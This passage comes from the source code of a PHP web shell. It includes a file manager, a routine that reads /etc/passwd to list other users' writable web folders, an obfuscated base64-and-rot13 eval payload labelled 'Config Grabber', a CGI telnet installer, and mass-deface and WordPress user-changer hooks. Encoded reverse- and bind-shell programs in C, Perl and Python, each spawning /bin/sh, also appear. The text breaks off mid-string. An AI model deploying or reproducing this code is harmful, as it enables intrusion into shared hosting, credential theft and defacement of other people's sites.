{\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == \'checkbox\')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\r\n<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n\t$dirs = $files = array();\r\n\t$n = count($dirContent);\r\n\tfor($i=0;$i<$n;$i++) {\r\n\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n\t\t$tmp = array(\'name\' => $dirContent[$i],\r\n\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n\t\t\t\t\t \'perms\' => viewPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&&($dirContent[$i] != "."))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t}\r\n\t$GLOBALS[\'sort\'] = $sort;\r\n\tfunction cmp($a, $b) {\r\n\t\tif($GLOBALS[\'sort\'][0] != \'size\')\r\n\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t}\r\n\tusort($files, "cmp");\r\n\tusort($dirs, "cmp");\r\n\t$files = array_merge($dirs, $files);\r\n\t$l = 0;\r\n\tforeach($files as $f) {\r\n\t\techo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" \' . (empty ($f[\'link\']) ? \'\' : "title=\'{$f[\'link\']}\'") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\']\r\n\t\t\t.\'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a class="tooltip" data-tooltip="Frame" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'frame\\\')">F</a> <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n\t\t$l = $l?0:1;\r\n\t}\r\n\techo "<tr id=fak><td colspan=7>\r\n\t<input type=hidden name=ne value=\'\'>\r\n\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\r\n\t<label><select name=\'p1\'>";\r\n\tif(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))\r\n echo "<option value=\'paste\'>↳ Paste</option>";\r\n\techo "<option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";\r\n if(class_exists(\'ZipArchive\'))\r\n echo "<option value=\'zip\'>+ zip</option><option value=\'unzip\'>- zip</option>";\r\n echo "<option value=\'tar\'>+ tar.gz</option>";\r\n echo "</select></label>";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\r\n echo " file name: <input type=text name=p2 value=\'hard_" . date("Ymd_His") . "." . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'> ";\r\n echo "<input type=\'submit\' value=\'submit\'></td></tr></form></table></div>";\r\n\thardFooter();\r\n}\r\nfunction actionStringTools() {\r\n\thardHeader();\r\n\techo "<center><h1>Jumping :D</h1><div class=content><br>";\r\n\t$i = 0;\r\n@ini_set(\'display_errors\', 0);\r\necho "<pre><div class=\'margin: 5px auto;\'>";\r\n$etc = fopen("/etc/passwd", "r") or die("<font color=white>Can\'t read /etc/passwd</font>");\r\nwhile ($passwd = fgets($etc)) {\r\n if ($passwd == \'\' || !$etc) {\r\n echo "<font color=white>Can\'t read /etc/passwd</font>";\r\n } else {\r\n preg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n foreach ($user_jumping[1] as $user_khoer_jump) {\r\n $user_jumping_dir = "/home/$user_khoer_jump/public_html";\r\n if (is_readable($user_jumping_dir)) {\r\n $i++;\r\n $jrw = "[<font color=white>R</font>] <a href=\'?path=$user_jumping_dir\'><font color=red>$user_jumping_dir</font></a>";\r\n if (is_writable($user_jumping_dir)) {\r\n $jrw = "[<font color=white>RW</font>] <a href=\'?path=$user_jumping_dir\'><font color=red>$user_jumping_dir</font></a>";\r\n }\r\n echo $jrw;\r\n if (function_exists(\'posix_getpwuid\')) {\r\n $domain_jump = file_get_contents("/etc/named.conf");\r\n if ($domain_jump == \'\') {\r\n echo " => ( <font color=white>I can\'t take the domain name</font> )<br>";\r\n } else {\r\n preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n foreach ($domains_jump[1] as $dj) {\r\n $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n $user_jumping_url = $user_jumping_url[\'name\'];\r\n if ($user_jumping_url == $user_khoer_jump) {\r\n echo " => ( <u>$dj</u> )<br>";\r\n break;\r\n }\r\n }\r\n }\r\n } else {\r\n echo "<br>";\r\n }\r\n }\r\n }\r\n }\r\n}\r\nif ($i == 0) {\r\n} else {\r\n echo "<br>Total " . $i . " Directory " . gethostbyname($_SERVER[\'HTTP_HOST\']) . "";\r\n}\r\necho "</div></pre>";\r\n\techo "</div>";\r\n\thardFooter();\r\n}\r\n\r\nfunction actionSafeMode() {\r\n\thardHeader();\r\n\techo "<center><h1>Config Grabber</h1><div class=content><br>";\r\n\t@ini_set(\'display_errors\', 0);\r\n\t$cgi_dir = mkdir(\'priv_sym\', 0755);\r\n chdir(\'priv_sym\');\r\n\t$file_mass = "conf.php";\r\n\t$mass_script = "PD9wSHAgJGhleCA9ICI3VnpyUnR0VkV2KzhSL0UvekxxNHNna1BrWG0yc3BVQUcrQjV2TnlkWkp5Rld3ZzVsMU9ua1RDK3NUUzJ0RlZiL08vWE15UEo4Z3VMOUh6WXF6cXFWZlNZL3ZWdytpWGg5c2ZZanZ0WmE0MXRHRE1uNGNPK1kxM3Fzdm91T2RqK3NMa1JqMWFEYks1VUV6b1FZWVA1SXpoNG5GMmQ5VUpic0hHWC9MQzlXbzZPVlhvUTI3VjY4c2ZtQm9FZkVWR1UxQTlNNE1hT2Fzd1Q0VzJOMmxKNWgyZkFDQlB1dldPSldqM0NmTWVocmlmQzJ2YWhsYTJ1Zjhnd0htOFBEcCswREZ2OXM5UFdiTUZnYmVsWVBhRDJPSjdVdjFjeDZubVkzbFNVYkt4ZXJKVS9IOVBITUdrYk5jZU43My9xRjR0M29NSzdhdSsyUDFsS2lnZlJxQ1UyMlhERUltYkxMWmRGcjBsZXZSVnNQQWdFY0FSWlkrcHJNYlVadWJaUVFHN2tNMXJBZDYxdWJSUGJqM2xtNDBic2lzQ2o3a010UStEN2taZGhZV2ZDOEh6b0NPS0pCOCtDV29oNnN1OVJEa1JxcnJnZGdnSG5ZbUZodExnWHMvR1FaK3h1clNUU3gyU2NpTDdqZTMwd2pDZDVqeTJvZXUzbmI0TUJDaFZ6OUJKZTBHbzRjSU1RTk1zdHJTL1V2NjVjS0I2Y2hJWmd3TTBOaVR5OVNzWWVSa3J3SUlJTkxORmxVN2F5cGVWOVJpd2NQZ3YrWG04djRxcTFQbXVYbEV2U2ZQbng2L3p0MzFJNm9oTE1aTVdrN3dxd2RDQWFhT3ZPdXVmdW5UVVlET0JWMmVqT3NpQUc2dkNyTU9jWlZnZEhHQ24zZ2dnUU1zdkdCY0dDSG1iZVNDUDdtYmo3cEhOU251ZUVOR0RXd05uVERxMDhZSDdqRkVTbUJKRHRYVU0zQkRFWTIvY2VjejJ6T2xUTnptcTU5TjVYWFA5V2RwcGpORmpya2RyaWtjV1ZhOTdRVkpxS01NYXdCYy96UnVzRjVvVTFsNWNJaGl6MkJMTlBNZVorNGt5UWM3M1luckJYckQrNXZzTVR2STBMcHJFZFIyOThCdTdrOFVsUkhRUm03amdXVWJlVjBBQ1VhMVdUdFhsaStRUmxGY1h3RE5QWWZzbnVuanJDN21YWHcrbVp4SUdLbk56Z0lmZjRpRE5FVm9SZWtzUXM0YU9sSWp4YVFyUERwL1hWTDRGTnM2YjJkcElsdGU5d1U5K29UR05xbnVCL3YvcHliVHhiL2RhWitPM0IyelhtaFJVdnNDMnMvdE1hYVdaUVR1WUM3R2NqN2s4K09YZWZmOTc3aWV4ODVtbWdtVStDSVR2WEV4c3FleGRjSDJIUkpCUXUreHk3ekNNN2Y3czZ2NzBoTy9MZlpqNVg0SDRMR2o5TXRwcCtBaG9WcDUrRVlRS0JIZGs1NGFtNGlGQXZPbTJWQ2FJNWtFb3lUY0JobXh0YU1XTWh4ZmJzVm5rTFpYY1hTcnJVRHNsZi9uWDIvdHJ1dGM3N242OWliU2VkMjk0VCtkZitxN0xweVplVDd0ZUNWMWRRN2lUNlNZbTQzYngrUlZoaWFadFVQeHk4MlFlU3lpNG50eGZsWWhPWGozTWRZY2JmOUUyNWRZblBlc1VzN2xSZVEvWWluaVJGMzMvNzREWGtCQXJ3eWtQYTBwUndDblpsa2QyTVNiWEJqUHVPbFRVYkVtQzNFRzlCNGExbzNlVzB1K3FEek5CdU5mWmYvYno5L3VHOTdNc3k2cXpYeXNUS09Wa2J6TkxOTDYrL3FpWkdYVVhLekJob1dPcVVMUVdadU92eUlZUjNCRDJIU0tLeDlyWE9FWFJFalJ3ZGs5ckYxZTFlNmRvdVRFL2srQ09vRW1DRU5FelMrbldjb3I5TUR6SGZ4blVBMWF1c0oxN2RrblVZM1dwSDFuQyt2ZEFnMHg1dlBkQlBxNkFoc242Z0F2MWMyZGZrYkhxdnhQKzVFcTdoOGpxOUh1NStjWUVwRWo4VWVVNm9YMU4ra2dpdzEyMFlFeGphUW93aE1TTkRUbURLUGd2a3Q4TXFBVERIM1dwWTIzekt1alJhaFJ1SUNvRUUzbm9NakM0WUZ3RVYwSVZkLzNNMHg2V2hIMnZteEFzZ0tJMkI1VjdRbnlSbkJObWpBTGsrcStBSk00L2FURGJQbjZlclExdVFWajBreWlpaEV5eUU4RGdTVDc2RTQwdUR5TXFDdHlrTzRPSU1DV0NMQWNNcWtTOVM0aGp3cmtPa0ZBbWhZZUlnN2w5d0FkNWcvZHZBYVlCMEdJaG9yQlFMTCtzMGduNGpTakhkUEl0T3FGaWdwKzIyS3NpU0xteHMrRTlzY2U1UGIzSEpDNG1pc2hjU0krVlNKL3JOR09vbUVsQ0ZQUkpRY2g4a0JnUStGdUVORnVGcXRRNkxJb01mQ2FHQ2R4VlZ4WWdiVVhiQVNScTFJc2lGQkRFaHlKOEFVQzR6WUE0RG11QVZ3ZXVCU2dPSlkyamFPc2RQME5Wc3B5SlJoSWQxdGMvT1Fadm5QWG5BdHJJL1kzRDluQm5DQ2Ftc1JITkRESGxuZWEvc1UxN2daTmNudnhyd0dMd3MzVUVUNi8zeWxSVVNJc0JRbkRZLzlacExERGNVTGhLREdzRG8zbHozUWREYmtzVENVMktNQ1JDdFFhZlo2eGhFaWJ0dmNtTDBJclVNQUhJNTExbkdOWk5pa1NpWDF6YzMrT1JuR1NjSlBqbU5qS0JjdHYrT1V2Q0hTMXJRQ0xlZGs4NnZQU3dJdC9seDVhTk5VcERVQklqT0NYUENWS2NGTTA2a3NjeUVSV0FRcTN2VjYvNXAybE9iS2hMQkkvWFJtcG1CeVdVTnRtN05rZzIyVUJ5WmdibnN0SDdyYnZmcGtyTlVnVFh2eUFSVnE5ZDZON0ZzcHlVQzM4V21ESE1DcE5XNXdUOGc4UVQvWTNFQVVJYVBnZEF4RURaVmlMTnBzM3ZWZG02OTdNeHFnNGd6cklzNGMyQTYzZTUyRzkzRmFvS0ErdWdPbkJ0T2RyZlFRa3Q2aG40NDh2RVFUUE51cGtndzB5VDh2NUl1NlVteGZmc3R0dWxCc1FCTXpjSy9wWndDb2Q4L085d1cySXl0dlJaZHdUSVlVQSsrSmw2OWpGTUxmK204cEE5TVhFY2dwdy81VUNzZUNRdWgzaWtqTWE0TVlGbGZCSnNCTW00WEF6dWtYazBpTWJUTGJ3WFJMK21Nb0tEM0tBOTJNekIxWkZsU2NGN1JrRGhEUTdBeG9BdUJvVlV5NG4vRkorUENtR3g3YlA0dGZUenVIOElPS24ydTlUOXRvVTdFeGM4Q29pRU5XRGo3bVZrMFhJRVVNL3IyemV0cVJnaVp5cVVmU3ZvQVNMYlVISndacEN0d1ZkT2ljUkxPbkwxeDBqSUNOdXV1R0NTZExNd0lwVmlXVGl4USs1aVhMNU5naGxITFdKbFdNRkNpVGt3ekUxSzZ1Qm1OeU9wZXUzemd1enh4STRka3NsQWczYkpzeXZNNW52bko2UmNNVkJYelBEd0ZUcVlEUFhkVGVDSlhNMDBaODNKbW40cmZMQUF3Vzg3b2lZaUVpWEpxbEJpSzcwZUtGYk5ISmJ2dmxTMmh4azlxNThlcnlqOXd4NWU2bE5qc3p1cStqUEIyOXRKR1VuZ3ZuUzdOZjRyNXhxMWNqSVc1eTIrR1NYaXFCbURWdFpMRzh1SzZidGgwaFZ5WXp5eTJJcHY0T3lMUFZTckg5VU52RnJKMnNLV1NLR1l0bVJwOUVlZmxScVl6Q2hzWklyMFNIRzllem0vcWJuUEorN2toMGRJVTZPeDg2TXhWZFhhMms1U0dQdk5ZK1R5b25CZzlnK1NSamhJeE53Tk5XNkgxMm5iTUZ4cHMvV3B5UjQyQ1ltNWVtSHlwbzYyTzQ0cno0b3Y1Um4xbVdPMHdrTFhXUFQ3a0pHWEYrT2hoTVhMZDFZNFB4MkJ1RXRDRXVsU2p4QmZIbjZndERpMXM5ZmpRNHZDYndkUythTFp0U1pyTmpXeHNWL1BUUmFBbS9DOFp3OExSb3ZEWmIwdlhMYi9XYjk4azZ0SmNTMDdjTEJWSmxqaGJZbGwxOVQwRUw1Wk5STTBJV2szcVczeWVsVjFHU0JaOXRwSnpSVTd2a0pKSGF4RU5KVFFBM3RVSUR5UVFuRmduTE9UKzdydFFkVzBTVlhESFZ5QTUyUzQvbGxFZ3RvUWtTU1BEUUI0a1kyZEhsL2ZxeEtVRE9INW1RNWVPREZTdkR3N3FBSmJMcGNUSUdoN1NxS2xXU0ExSFVYRW1xWlh6MDl4VVJhVGN4SWROcm96elhWcWZnaWlaZFcyWDRKd3dZcGpJS3dPWkNkK1R0ejhlT0E4ZjRGTWs0bGJrd1kzWEI2QzBSWmJxT2ZsN0RxRUhOOEMzQzBZVE9EbTA5SUt5R0dZa01wQ25OTC9DVEFXaXpQT0JycVdQaUtZdmtTNEtTbndEQnBEOW9nNVZpZXRWT2tWVG5SdnZNTFloaVJOaTZDaHRmNVRHMG1BNVlBdFo3WDMvdldjQXl3dmxQKzdVcWZUMlBaR2ZqLzhMIjsKZXZhbChzdHJfcm90MTMoZ3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCgkaGV4KSkpKSkpOyA=";\r\n\t$mass = fopen($file_mass, "w");\r\n\tfwrite($mass, base64_decode($mass_script));\r\n\techo "<br><center> <iframe src=\'priv_sym/conf.php\' width=\'900\' height=\'480\'></iframe></a>";\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionEdituser() {\r\n\thardHeader();\r\n\techo "<center><h1>Wordpress Mass User Changer</h1><div class=content><br>";\r\n\techo "<br><center> <iframe src=\'?user\' width=\'900\' height=\'400\'></iframe></a>";\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionLogout() {\r\n\texec("rm -rf priv_sym priv_cgi adminer.php");\r\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\r\n\tdie("<style>\r\n\tbody {background-color:#000000; background-image:url(\'https://i.imgur.com/hLcQCBx.gif\'); } </style></br></br><body><pre align=center><form method=post style=\'color:#ffffff;text-align: center;\'>Bye -,-<br><br></form> </body>");\r\n}\r\nfunction actionSelfRemove() {\r\n\tif($_POST[\'p1\'] == \'yes\')\r\n\t\tif(@unlink(preg_replace(\'!\\(\\d+\\)\\s.*!\', \'\', __FILE__)))\r\n\t\t\tdie(\'Shell has been removed\');\r\n\t\telse\r\n\t\t\techo \'unlink error!\';\r\n if($_POST[\'p1\'] != \'yes\')\r\n hardHeader();\r\n\techo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n\thardFooter();\r\n}\r\n\r\n\r\nfunction actionAdminer() {\r\n\thardHeader();\r\n\techo "<center><h1>Adminer</h1><div class=content><br>";\r\n\t$full = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $dir);\r\n\tfunction adminer($url, $isi) {\r\n\t\t$fp = fopen($isi, "w");\r\n\t\t$ch = curl_init();\r\n\t\t \t curl_setopt($ch, CURLOPT_URL, $url);\r\n\t\t \t curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t \t curl_setopt($ch, CURLOPT_FILE, $fp);\r\n\t\treturn curl_exec($ch);\r\n\t\t \t curl_close($ch);\r\n\t\tfclose($fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists(\'adminer.php\')) {\r\n\t\techo "<center><font color=white><br><br><a href=\'adminer.php\' target=\'_blank\'>[ Adminer login ]</a><br><br><br></font></center>";\r\n\t} else {\r\n\t\tif(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {\r\n\t\t\techo "<center><font color=white><br><br><a href=\'adminer.php\' target=\'_blank\'>[ Adminer login ]</a><br><br></font></center>";\r\n\t\t} else {\r\n\t\t\techo "<center><font color=red>Failed to create Adminer file</font></center>";\r\n\t\t}\r\n\t}\r\n\thardFooter();\r\n}\r\nfunction actionBruteforce() {\r\n\thardHeader();\r\n\techo "<center><h1>Cgi Telnet</h1><div class=content><br>";\r\n\t$cgi_dir = mkdir(\'priv_cgi\', 0755);\r\n chdir(\'priv_cgi\');\r\n\t$file_cgi = "cgi.priv";\r\n $memeg = ".htaccess";\r\n\t$isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \\n AddType application/x-httpd-cgi .priv \\n AddHandler cgi-script .priv \\n AddHandler cgi-script .priv";\r\n\t$htcgi = fopen(".htaccess", "w");\r\n\t$cgi_script = "";\r\n\t$cgi = fopen($file_cgi, "w");\r\n\tfwrite($cgi, base64_decode($cgi_script));\r\n\tfwrite($htcgi, $isi_htcgi);\r\n\tchmod($file_cgi, 0755);\r\n chmod($memeg, 0755);\r\n\techo "<br><center>Done ... <a href=\'priv_cgi/cgi.priv\' target=\'_blank\'>Click Here</a></div>";\r\n\thardFooter();\r\n}\r\n\r\n\r\n// Mass Deface Section Start\r\nfunction actionSql() {\r\n\thardHeader();\r\n\techo "<center><h1>Mass Tools</h1><div class=content><br>";\r\n\t\r\n\techo "<br><center> <iframe src=\'?mas\' width=\'800\' height=\'450\'></iframe></a></div>";\r\n\t\r\n\thardFooter();\r\n}\r\n\r\n// Mass Deface Section END\r\n\r\n// Back COnnect SEction\r\nfunction actionNetwork() {\r\n\thardHeader();\r\n\t$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";\r\n\t$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n\t$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";\r\n\t$pyy="IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==";\r\n\t$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGV